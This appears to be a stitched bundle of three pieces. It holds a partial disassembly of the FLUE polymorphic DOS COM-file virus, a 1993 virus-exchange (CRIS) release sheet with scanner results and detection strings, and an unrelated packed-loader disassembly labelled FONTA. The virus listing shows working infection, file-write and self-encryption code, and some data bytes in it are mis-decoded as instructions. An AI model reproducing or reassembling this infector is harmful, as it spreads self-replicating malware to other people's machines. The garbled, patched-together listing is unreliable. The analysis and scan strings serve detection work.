1000:02ad 3e
1000:02ae c6 86 9d05 3c MOV BYTE PTR DS:[BP+Data24], 3ch
1000:02b3 3e
1000:02b4 c7 86 a405 3105 MOV WORD PTR DS:[BP+Jmp4], 0531h
1000:02ba 3e
1000:02bb c7 86 a805 4747 MOV WORD PTR DS:[BP+Data25], 4747h
1000:02c1 Jmp17:
1000:02c1 e8 5801 CALL Proc6
1000:02c4 3c 04 CMP AL, 04h
1000:02c6 72 1c JB Jmp18
1000:02c8 3e
1000:02c9 80 be 9a05 46 CMP BYTE PTR DS:[BP+Proc1], 46h
1000:02ce 72 08 JB Jmp19
1000:02d0 77 0c JA Jmp20
1000:02d2 3c 05 CMP AL, 05h
1000:02d4 75 62 JNZ Jmp21
1000:02d6 eb e9 JMP Jmp17
1000:02d8 Jmp19:
1000:02d8 3c 04 CMP AL, 04h
1000:02da 75 47 JNZ Jmp24
1000:02dc eb e3 JMP Jmp17
1000:02de Jmp20:
1000:02de 3c 06 CMP AL, 06h
1000:02e0 75 6b JNZ Jmp23
1000:02e2 eb dd JMP Jmp17
1000:02e4 Jmp18:
1000:02e4 3c 02 CMP AL, 02h
1000:02e6 72 17 JB Jmp25
1000:02e8 77 24 JA Jmp26
1000:02ea 3e
1000:02eb c6 86 a105 ba MOV BYTE PTR DS:[BP+Data26], bah
1000:02f0 3e
1000:02f1 80 86 a505 10 ADD BYTE PTR DS:[BP+Data27], 10h
1000:02f6 3e
1000:02f7 c6 86 a705 d2 MOV BYTE PTR DS:[BP+Data28], d2h
1000:02fc eb 61 JMP Jmp22
1000:02fe db 90
1000:02ff Jmp25:
1000:02ff 3e
1000:0300 c6 86 a105 b8 MOV BYTE PTR DS:[BP+Data26], b8h
1000:0305 3e
1000:0306 c6 86 a705 d0 MOV BYTE PTR DS:[BP+Data28], d0h
1000:030b eb 52 JMP Jmp22
1000:030d db 90
1000:030e Jmp26:
1000:030e 3e
1000:030f c6 86 a105 bd MOV BYTE PTR DS:[BP+Data26], bdh
1000:0314 3e
1000:0315 80 86 a505 28 ADD BYTE PTR DS:[BP+Data27], 28h
1000:031a 3e
1000:031b c6 86 a705 d5 MOV BYTE PTR DS:[BP+Data28], d5h
1000:0320 eb 3d JMP Jmp22
1000:0322 db 90
1000:0323 Jmp24:
1000:0323 3e
1000:0324 c6 86 a105 bb MOV BYTE PTR DS:[BP+Data26], bbh
1000:0329 3e
1000:032a 80 86 a505 18 ADD BYTE PTR DS:[BP+Data27], 18h
1000:032f 3e
1000:0330 c6 86 a705 d3 MOV BYTE PTR DS:[BP+Data28], d3h
1000:0335 eb 28 JMP Jmp22
1000:0337 db 90
1000:0338 Jmp21:
1000:0338 3e
1000:0339 c6 86 a105 be MOV BYTE PTR DS:[BP+Data26], beh
1000:033e 3e
1000:033f 80 86 a505 30 ADD BYTE PTR DS:[BP+Data27], 30h
1000:0344 3e
1000:0345 c6 86 a705 d6 MOV BYTE PTR DS:[BP+Data28], d6h
1000:034a eb 13 JMP Jmp22
1000:034c db 90
1000:034d Jmp23:
1000:034d 3e
1000:034e c6 86 a105 bf MOV BYTE PTR DS:[BP+Data26], bfh
1000:0353 3e
1000:0354 80 86 a505 38 ADD BYTE PTR DS:[BP+Data27], 38h
1000:0359 3e
1000:035a c6 86 a705 d7 MOV BYTE PTR DS:[BP+Data28], d7h
1000:035f Jmp22:
1000:035f 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:0363 8b fe MOV DI, SI
1000:0365 8b de MOV BX, SI
1000:0367 55 PUSH BP
1000:0368 e8 3302 CALL Proc0
1000:036b 5d POP BP
1000:036c b8 0042 MOV AX, 4200h
1000:036f 3e
1000:0370 8b 9e 4f04 MOV BX, WORD PTR DS:[BP+Data16]
1000:0374 33 c9 XOR CX, CX
1000:0376 33 d2 XOR DX, DX
1000:0378 cd 21 INT 21h ;Seek on file
1000:037a b4 40 MOV AH, 40h
1000:037c b9 0300 MOV CX, 0003h
1000:037f 8d 96 5504 LEA DX, WORD PTR [BP+Data29]
1000:0383 cd 21 INT 21h ;Write file
1000:0385 b8 00b8 MOV AX, b800h
1000:0388 8e c0 MOV ES, AX
1000:038a 8e d8 MOV DS, AX
1000:038c 33 f6 XOR SI, SI
1000:038e 33 ff XOR DI, DI
1000:0390 b9 1800 MOV CX, 0018h
1000:0393 51 PUSH CX
1000:0394 b9 5000 MOV CX, 0050h
1000:0397 ad LODSW
1000:0398 50 PUSH AX
1000:0399 e2 fc LOOP Data30
1000:039b b9 5000 MOV CX, 0050h
1000:039e 58 POP AX
1000:039f ab STOSW
1000:03a0 e2 fc LOOP Data31
1000:03a2 59 POP CX
1000:03a3 e2 ee LOOP Data32
1000:03a5 0e PUSH CS
1000:03a6 0e PUSH CS
1000:03a7 1f POP DS
1000:03a8 07 POP ES
1000:03a9 3e
1000:03aa fe 8e 5104 DEC BYTE PTR DS:[BP+Data12]
1000:03ae e9 d9fd JMP Jmp10
1000:03b1 Jmp3:
1000:03b1 8d b6 ce03 LEA SI, WORD PTR [BP+Data7]
1000:03b5 8d be ad05 LEA DI, WORD PTR [BP+Data8]
1000:03b9 b9 3900 MOV CX, 0039h
1000:03bc fc CLD
1000:03bd f3 REPNZ
1000:03be a4 MOVSB
1000:03bf 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:03c3 8b fe MOV DI, SI
1000:03c5 8b de MOV BX, SI
1000:03c7 b9 c901 MOV CX, 01c9h
1000:03ca 55 PUSH BP
1000:03cb e9 d601 JMP Jmp4
1000:03ce Data7:
1000:03ce db 5d,b8,24,25,3e,8b,96,f0,04,8e,da,3e,8b,96,ee,04,cd,21,b4,1a
1000:03e2 db 5a,1f,cd,21,0e,1f,b4,3b,8d,96,ad,04,cd,21,e4,21,24,fd,e6,21
1000:03f6 db 33,c0,33,db,33,c9,33,d2,33,ed,be,00,01,bf,00,01,c3
1000:0407 Proc5:
1000:0407 b8 0242 MOV AX, 4202h
1000:040a 33 c9 XOR CX, CX
1000:040c 33 d2 XOR DX, DX
1000:040e cd 21 INT 21h ;Seek on file
1000:0410 2d 0300 SUB AX, 0003h
1000:0413 3e
1000:0414 89 86 5604 MOV WORD PTR DS:[BP+Data41], AX
1000:0418 05 0300 ADD AX, 0003h
1000:041b c3 RET
1000:041c Proc6:
1000:041c e8 0b00 CALL Proc4
1000:041f 24 0f AND AL, 0fh
1000:0421 d0 e8 SHR AL, 1
1000:0423 3c 05 CMP AL, 05h
1000:0425 77 f5 JA Proc6
1000:0427 fe c0 INC AL
1000:0429 c3 RET
1000:042a Proc4:
1000:042a b4 2c MOV AH, 2ch
1000:042c cd 21 INT 21h ;Get time
1000:042e 86 ea XCHG CH, DL
1000:0430 90 NOP
1000:0431 b4 2c MOV AH, 2ch
1000:0433 cd 21 INT 21h ;Get time
1000:0435 86 ca XCHG CL, DL
1000:0437 e4 40 IN AL, 40h
1000:0439 86 e0 XCHG AH, AL
1000:043b e4 40 IN AL, 40h
1000:043d 33 c1 XOR AX, CX
1000:043f c3 RET
1000:0440 Data5:
1000:0440 db b9,09,00,58,e2,fd,5d,1f,07,5a,1f,9d,e9,62,ff,00,00,00,eb,10
1000:044f Data16:
1000:0451 Data12:
1000:0452 Data1:
1000:0453 Data20:
1000:0454 db 90,e9,fd,fe
1000:0455 Data29:
1000:0456 Data41:
1000:0458 Data13:
1000:0458 db '*.COM'
1000:045d db 00,2e,2e,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:045e Data14:
1000:0461 Data11:
1000:0471 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:0476 Data19:
1000:0477 Data17:
1000:0479 Data18:
1000:047f Data15:
1000:0485 db 00,00,00,00,00,00,00,20,22,9d,ed,e6,20,e0
1000:0493 e2 ee LOOP Data33
1000:0495 20 f3 AND BL, DH
1000:0497 ad LODSW
1000:0498 87 de XCHG BX, SI
1000:049a 3c 22 CMP AL, 22h
1000:049c 2c 20 SUB AL, 20h
1000:049e f3 REPNZ
1000:049f e0 79 LOOPNZ Data34
1000:04a1 f3 REPNZ
1000:04a2 3a 20 CMP AH, BYTE PTR [BX+SI]
1000:04a4 5b POP BX
1000:04a5 44 INC SP
1000:04a6 e0 52 LOOPNZ Data35
1000:04a8 db 6b,52,e0,59,5d,5c,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04ae Data2:
1000:04bc db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04d0 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04e4 db 00,00,00,00,00,00,00,00,00,00,00,00,00,00
1000:04ee Data3:
1000:04f0 Data4:
1000:04f2 db 'Hatsjeee'
1000:04fa 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h
1000:04fc 20 28 AND BYTE PTR [BX+SI], CH
1000:04fe 43 INC BX
1000:04ff 29 20 SUB WORD PTR [BX+SI], SP
1000:0501 31 39 XOR WORD PTR [BX+DI], DI
1000:0503 39 32 CMP WORD PTR [BP+SI], SI
1000:0505 2f DAS
1000:0506 31 39 XOR WORD PTR [BX+DI], DI
1000:0508 39 33 CMP WORD PTR [BP+DI], SI
1000:050a 20 62 79 AND BYTE PTR [BP+SI+Data37], AH
1000:050d 20 54 72 AND BYTE PTR [SI+Data38], DL
1000:0510 db 'idenT / [D'
1000:051a 69 64 65 6e54 XOR WORD PTR [SI+Data39], 546eh
1000:051c db 6b,52,e0
1000:051f db 'Y]Oh, BTW it's from '
1000:0533 db 'Holland, and is call'
1000:0547 db 'ed THE FLUEFor those'
1000:055b db ' who are interested'
1000:056e 6b 52 e0 595d XOR WORD PTR [BP+SIData36], 5d59h
1000:056f 2e
1000:0570 2e
1000:0571 2e
1000:0572 2e
1000:0573 2e
1000:0574 Data22:
1000:0574 58 POP AX
1000:0575 5d POP BP
1000:0576 55 PUSH BP
1000:0577 50 PUSH AX
1000:0578 3e
1000:0579 c6 86 ad05 c3 MOV BYTE PTR DS:[BP+Data8], c3h
1000:057e b4 40 MOV AH, 40h
1000:0580 bb 0000 MOV BX, 0000h
1000:0581 Data21:
1000:0583 b9 9b04 MOV CX, 049bh
1000:0586 8d 96 1301 LEA DX, WORD PTR [BP+Jmp0]
1000:058a cd 21 INT 21h ;Write file
1000:058c 8d be 9e05 LEA DI, WORD PTR [BP+Proc0]
1000:0590 57 PUSH DI
1000:0591 8d b6 1601 LEA SI, WORD PTR [BP+Data9]
1000:0595 8b fe MOV DI, SI
1000:0597 8b de MOV BX, SI
1000:0599 c3 RET
1000:059a Proc1:
1000:059a 89 e3 MOV BX, SP
1000:059b Data23:
1000:059c 8b 37 MOV SI, WORD PTR [BX]
1000:059d Data24:
1000:059e Proc0:
1000:059e b9 4002 MOV CX, 0240h
1000:05a1 Data26:
1000:05a1 b8 0000 MOV AX, 0000h
1000:05a2 Data6:
1000:05a4 Jmp4:
1000:05a4 31 04 XOR WORD PTR [SI], AX
1000:05a5 Data27:
1000:05a6 f7 d0 NOT AX
1000:05a7 Data28:
1000:05a8 Data25:
1000:05a8 46 INC SI
1000:05a9 46 INC SI
1000:05aa 49 DEC CX
1000:05ab 75 f7 JNZ Jmp4
1000:05ad Data8:
1000:05ad c3 RET
1000:ffe0 Data36:
2f18:0393 Data32:
2f18:0397 Data30:
2f18:039e Data31:
2f18:0483 Data33:
2f18:04fa Data35:
2f18:051a Data34:
2f18:056e Data40:
2f18:05a2 Data0:
eda4:0000 Data10:
eda4:0065 Data39:
eda4:0072 Data38:
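Review bot: Part of this listing is data that the disassembler rendered as instructions, and nothing in the section says so. The bytes at 1000:04fc through 1000:050d (`20 28 43 29 20 31 39 39 32 2f 31 39 39 33 20 62 79 20 54 72`) are the ASCII text " (C) 1992/1993 by Tr", sitting between the `db 'Hatsjeee'` and `db 'idenT / [D'` lines, so the `AND`, `SUB`, `XOR` and `DAS` mnemonics there are not code. The run at 1000:0493 to 1000:04a6 looks like the same kind of artefact. The prefix byte `f3` is also printed as `REPNZ` before `MOVSB` at 1000:0133, 1000:0260 and 1000:03bd, although f3 encodes REP and REPNZ is f2. I would add `; data, not code: text mis-decoded by the disassembler` above each such run and `; f3 = REP` on the prefix lines, so a reader does not chase control flow that does not exist.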
+140
@@ -0,0 +1,140 @@
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ ³
³ This Virus Came To You By Way Of... ³
³ ³
³ ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÛÜ ÜÛÜ ÜÛÛÛÛÛÛÛÜ ³
³ ÛÛÛÛß ßÛÛÛ ÛÛÛß ßÛÛÛ ÛÛÛÛÛ ÛÛÛÛß ßÛÛÛÛ ³
³ ÛÛÛÛ ÛÛÛÜ ÜÛÛÛ ÛÛÛÛÛ ßÛÛÛÛÛÜÜ ³
³ ÛÛÛÛ ÛÛÛÛÛÛÛÛÛß ÛÛÛÛÛ ßßÛÛÛÛÛÜ ³
³ ÛÛÛÛÜ ÜÛÛÛ ÜÛÛÜ ÛÛÛÛ ßÛÛÛÛÜ ÜÛÛÜ ÛÛÛÛÛ ÜÛÛÜ ÛÛÛÛÜ ÜÛÛÛÛ ÜÛÛÜ ³
³ ßÛÛÛÛÛÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛÛß ßÛß ßÛÛß ßÛÛÛÛÛÛÛß ßÛÛß ³
³ ³
³ ³
³ Computer Research & Information Service ³
³ ³
³ ³
³ Cris is a group of computer users that have a true interest in ³
³ Computer Viruses and Trojans, as well as how they work. ³
³ ³
³ Members of Cris feel a need, not only to be up on the latest ³
³ Bombs, Trojans, Worms, and Viruses, but to safely transfer these ³
³ files into the hands of other dedicated researchers. ³
³ ³
³ Cris cannot be held responsible for the use or misuse of these ³
³ files. Cris releases are sent out to better the knowledge of the ³
³ virus community, for those who would like to learn more about them ³
³ and how they work. ³
³ ³
³ Also, all Cris releases have been pre-tested and informative text ³
³ files are enclosed with valuable information regarding the type of ³
³ virus, how it works, and removal information. If the virus you ³
³ downloaded is not a Cris release, you don't know what you've got. ³
³ ³
³ DuWayne Bonkoski ³
³ (Original Text Written By Michael Paris) ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Cris Release Date:12/18/93 ³
³ Type: Virus ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ VSUM Information - Quoted from Patricia M. Hoffman's Hypertext VSUM ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ No Information Found ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Scanning Results ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ ³
³ McAfee's ViruScan Reports - Detected [Flue] ³
³ File had to be deleted ³
³ F-Prot's ViruScan Reports - Detected [Flue] ³
³ File had to be deleted ³
³ TBAV's ViruScan Reports - Detected [Flue] ³ ³
³ Successfully repaired executable ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Researcher's Notes ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ The FLUE virus is a polymorphic virus which infects COM files only. The ³
³ FLUE virus has a very visible way to letting you know it has infected ³
³ a file. The virus will "flip" a character screen from right to left or ³
³ vice versa. The screen flip does not work on monochrome monitors, however, ³
³ because the virus is hard-coded to read segment B800 which is where screen ³
³ information lies for color text modes. Monochrome video lies in ³
³ the B000 segment and the virus does not have a routine to sense which ³
³ type of video is being used. ³
³ ³
³ The virus hooks interrupt 24 (Critical Error Handler) which causes the ³
³ virus to replicate if a critical error occurs during execution. ³
³ ³
³ The virus does not become memory resident as far as I can tell. ³
³ ³
³ A character string can be found within the virus body which may appear ³
³ un-encrypted within infected files. The string reads as follows: ³
³ ³
³ Hatsjeee!! <C> 1992/1993 by TridenT / [DàRkRàY]Oh, BTW it's from Holland, ³
³ and is called the FLUEFor those who are interested...... ³
³ ³
³ ³
³ Encryption ³
³ ========== ³
³ The FLUE encrypts itself by XOR'ing the body of the virus with a ³
³ randomly generated word varaiable and then uses the variable's complement ³
³ on the next encryption cycle. ³
³ ³
³ ³
³ Infection ³
³ ========= ³
³ The FLUE infects COM files having a length between 500 and 47987 bytes. ³
³ The virus does not check to see if the file has already been infected and ³
³ will attempt to re-infect an already infected file. ³
³ The decryption routine the virus creates is very polymorphic. The program ³
³ will randomly change which registers it uses to decrypt itself for each ³
³ infected file. ³
³ ³
³ The infected files grow by a varying number of bytes. The virus ³
³ copies a random number of bytes from the zero page and appends them to ³
³ the end of the executable before infecting the file. This is what causes ³
³ the random growth. ³
³ ³
³ Upon execution of an infected file, the virus will try to infect between ³
³ one and eight files plus one more for each directory it moves into. ³
³ ³
³ An interesting note on how the virus appends itself to other COM files. ³
³ At first glance, the source codes does not show any significant file ³
³ write routines that are necessary to cause replication. It took me ³
³ a while to figure out how the virus accomplished this. It does this ³
³ by building it's own write routine as it runs in memory. Just another ³
³ example of the polymorphic capabilities of this virus. ³
³ ³
³ ³
³ Detection ³
³ ========= ³
³ All scanners tested will detect this virus. ³
³ ³
³ This virus can be detected using the following scan strings (for those ³
³ who are using older/other scan utilities): ³
³ ³
³ 89?18B?1B94002?331?1F7?349 - TBAV ³
³ 89??8B??B94002??????31??F7??????49 - F-PROT ³
³ 89?8B?B94002???31?F7???49 - SCAN ³
³ ³
³ ³
³ Summary ³
³ ======= ³
³ I have to admit, the virus was a challenge for me due to it's polymorphic ³
³ capabilities. I had to step through it a couple of times to get a feel ³
³ for what was going on. I'm not sure why all the polymorphism is used ³
³ in this particular strain since the visual cues easily let you know ³
³ something unusual is happening. Otherwise, this virus is a pretty fast ³
³ replicator that wants to be noticed in its own little way. ³
³ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
+671
@@ -0,0 +1,671 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ FONTA ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 19-Jan-92 ÛÛ
;ÛÛ Code type: special ÛÛ
;ÛÛ Passes: 5 Analysis Options on: none ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_28e equ 1003h ;*
data_29e equ 1232h ;*
data_30e equ 180Ch ;*
data_33e equ 2005h ;*
data_36e equ 2412h ;*
data_38e equ 3079h ;*
data_47e equ 7830h ;*
data_50e equ 91F0h ;*
data_51e equ 99BDh ;*
data_53e equ 0A901h ;*
data_56e equ 0B3A1h ;*
data_60e equ 0BD01h ;*
data_61e equ 0BF04h ;*
data_70e equ 0F601h ;*
data_71e equ 0F630h ;*
data_72e equ 0F712h ;*
;-------------------------------------------------------------- seg_a ----
seg_a segment byte public
assume cs:seg_a , ds:seg_a
mov ax,3463h
mov dx,75Ch
cmp ax,sp
jae loc_2 ; Jump if above or =
mov ax,sp
sub ax,344h
and ax,0FFF0h
mov di,ax
mov cx,0A2h
mov si,17Ch
cld ; Clear direction
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
mov bx,ax
mov cl,4
shr bx,cl ; Shift w/zeros fill
mov cx,ds
add bx,cx
push bx
xor bx,bx ; Zero register
push bx
retf ; Return far
db 0Dh, 01h, 41h
db 'nother Fine aHa/nBa Elite/WareZZ'
db 'ZZZZZZZZZZZZZZZZNot enough memor'
db 'y$'
loc_2:
mov ax,900h
mov dx,15Fh
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
int 20h ; DOS program terminate
nop
std ; Set direction flag
mov di,ax
dec di
dec di
mov si,offset data_22
add si,dx
mov cx,dx
shr cx,1 ; Shift w/zeros fill
rep movsw ; Rep when cx >0 Mov [si] to es:[di]
cld ; Clear direction
xchg si,di
inc si
inc si
mov di,100h
lodsw ; String [si] to ax
xchg ax,bp
mov dx,10h
jmp short loc_12
db 90h
loc_3:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_14
loc_4:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_15
loc_5:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_16
loc_6:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_20
loc_7:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_21
loc_8:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_22
loc_9:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jmp short loc_23
loc_10:
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
jc loc_13 ; Jump if carry Set
loc_11:
movsb ; Mov [si] to es:[di]
loc_12:
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_10 ; Jump if zero
jnc loc_11 ; Jump if carry=0
loc_13:
xor cx,cx ; Zero register
xor bx,bx ; Zero register
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_3 ; Jump if zero
loc_14:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_4 ; Jump if zero
loc_15:
rcl bx,1 ; Rotate thru carry
test bx,bx
jz loc_18 ; Jump if zero
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_5 ; Jump if zero
loc_16:
rcl bx,1 ; Rotate thru carry
cmp bl,6
jb loc_18 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_17 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_17:
rcl bx,1 ; Rotate thru carry
loc_18:
mov cl,byte ptr cs:[11Ch][bx]
cmp cl,0Ah
je loc_26 ; Jump if equal
loc_19:
xor bx,bx ; Zero register
cmp cx,2
je loc_25 ; Jump if equal
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_6 ; Jump if zero
loc_20:
jc loc_25 ; Jump if carry Set
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_7 ; Jump if zero
loc_21:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_8 ; Jump if zero
loc_22:
rcl bx,1 ; Rotate thru carry
shr bp,1 ; Shift w/zeros fill
dec dx
jz loc_9 ; Jump if zero
loc_23:
rcl bx,1 ; Rotate thru carry
cmp bl,2
jae loc_27 ; Jump if above or =
loc_24:
mov bh,byte ptr cs:[12Ch][bx]
loc_25:
lodsb ; String [si] to al
mov bl,al
push si
mov si,di
sub si,bx
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop si
jmp short loc_12
loc_26:
lodsb ; String [si] to al
add cl,al
adc ch,0
cmp al,0FFh
jne loc_19 ; Jump if not equal
jmp short loc_31
loc_27:
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_28 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_28:
rcl bx,1 ; Rotate thru carry
cmp bl,8
jb loc_24 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_29 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_29:
rcl bx,1 ; Rotate thru carry
cmp bl,17h
jb loc_24 ; Jump if below
shr bp,1 ; Shift w/zeros fill
dec dx
jnz loc_30 ; Jump if not zero
lodsw ; String [si] to ax
xchg ax,bp
mov dl,10h
loc_30:
rcl bx,1 ; Rotate thru carry
and bx,0DFh
xchg bl,bh
jmp short loc_25
loc_31:
xor ax,ax ; Zero register
push es
mov bx,100h
push bx
mov bx,ax
mov cx,ax
mov dx,ax
mov bp,ax
mov si,ax
mov di,ax
retf ; Return far
db 03h, 00h, 02h, 0Ah, 04h, 05h
db 00h, 00h, 00h, 00h, 00h, 00h
db 06h, 07h, 08h, 09h, 01h, 02h
db 00h, 00h, 03h, 04h, 05h, 06h
db 00h
db 7 dup (0)
db 07h, 08h, 09h, 0Ah, 0Bh, 0Ch
db 0Dh, 90h,0A0h, 00h,0EBh, 33h
db 90h, 0Dh, 20h, 01h, 0Dh, 0Ah
db 20h, 41h, 6Eh, 6Fh, 00h, 00h
db 'ther fine aHa/nB'
db 0C0h
db 9, 'a WAREZ'
db 01h, 00h, 1Ah, 03h, 00h, 40h
db 02h, 01h, 01h, 04h, 7Ah, 10h
db 00h, 01h,0B8h, 00h, 05h,0CDh
db 10h,0B4h, 0Fh, 01h, 80h, 04h
db 0BFh, 2Ch, 01h, 8Ah, 25h, 3Ah
db 0C4h, 74h, 06h, 8Ah,0C4h, 32h
db 0E4h, 02h
db 45h
loc_33:
;* pop cs ; Dangerous 8088 only
db 0Fh
mov bp,163h
mov di,data_29e
cmp ax,1B9h
or ah,[bp+di]
xor dx,dx ; Zero register
xor bl,bl ; Zero register
mov ax,1110h
adc al,0C3h
nop
sbb ax,50h
pop es
add [bp-7Fh],di
movsw ; Mov [si] to es:[di]
add word ptr ds:data_51e[bx+di],284Eh
add al,7Eh ; '~'
adc [si-2],bh
db 0FEh,0D6h, 03h,0B8h,0A9h,0BAh
db 0C6h,0FEh, 7Ch, 21h, 6Ch,0EEh
db 0Fh,0C2h, 8Dh, 01h, 7Ch, 38h
db 10h, 10h, 10h, 38h, 7Ch, 3Eh
db 0ABh, 01h, 0Eh, 10h, 0Dh,0D4h
db 9Fh, 24h, 6Ch, 07h, 1Fh,0FEh
db 0A4h, 43h,0FEh, 10h, 01h, 18h
db 3Ch, 9Ch, 26h, 01h, 18h, 0Bh
db 0FFh, 01h,0E7h, 65h, 3Bh,0C3h
db 01h,0E7h, 0Ah,0FFh,0D5h, 7Dh
db 1Fh, 66h, 01h, 21h,0AAh,0BBh
db 1Fh, 99h, 01h, 21h, 80h, 74h
db 12h, 1Eh
db 0Eh, 1Eh, 36h, 78h,0CCh, 01h
